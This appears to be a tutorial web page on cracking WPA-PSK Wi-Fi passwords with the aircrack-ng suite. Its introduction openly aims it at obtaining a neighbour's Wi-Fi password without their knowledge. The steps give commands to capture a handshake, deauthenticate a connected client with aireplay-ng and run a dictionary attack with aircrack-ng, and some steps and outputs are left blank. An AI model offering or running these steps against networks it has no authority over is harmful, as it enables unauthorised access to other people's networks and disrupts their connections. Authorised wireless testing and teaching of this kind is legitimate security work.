Open In App

Wireless Pentest Basic

Last Updated : 03 Aug, 2022
Improve
Improve
Like Article
Like
Save
Share
Report

Wireless Pen-testing :
Many of them want to use wi-fi , most of them try to hack the wi-fi and get the password without acknowledgement of neighbor  but they are failed to find the password. so in this tutorial I will help you to find the password of the neighbor’s wi-fi password. I am sure this will be crazy tutorial all them will enjoy after learning about it.

Wireless Card :
In case, If you are using a Kali Linux as the Virtual Machine in VM VirtualBox, You can use external wireless adapter. 

WPA PSK Exploit Walkthrough :
Here we will discuss the WPA PSK Exploit Walkthrough step by step as follows.

Step-1 :
Checking Wireless Network Card.

Step-2 :
Run airmon-ng to check and kill for the processes that could interfere with the operation.

Step-3 :
Put the network adapter in monitoring mode.

Step-4 :
Now, check for available wireless networks.  

command –

airodump-ng wlan0mon  

Output :  

Step-5 :
Run the below command to capture the traffic. List of workstations and data transfer as follows.

root@kali:~# airodump-ng -c 2 --bssid 50:D4:F7:3C:3A:76 -w capturedfile wlan0mon  

Step-6 :
Run this command to disconnect a client from the network and force it to reconnect.

root@kali:~# aireplay-ng -0 10 -a 50:D4:F7:3C:3A:76 -c 08:D8:33:F2:3B:50 wlan0mon 

Step-7 :
Now there should be a captured file .cap in the directory.

Step-8 :
Run the below command to extract the password from the file.

root@kali:~# aircrack-ng -w mywordlist.txt -b 50:D4:F7:3C:3A:76 capturedfile-02.cap 


Like Article
Suggest improvement
Previous
Next
Share your thoughts in the comments

Similar Reads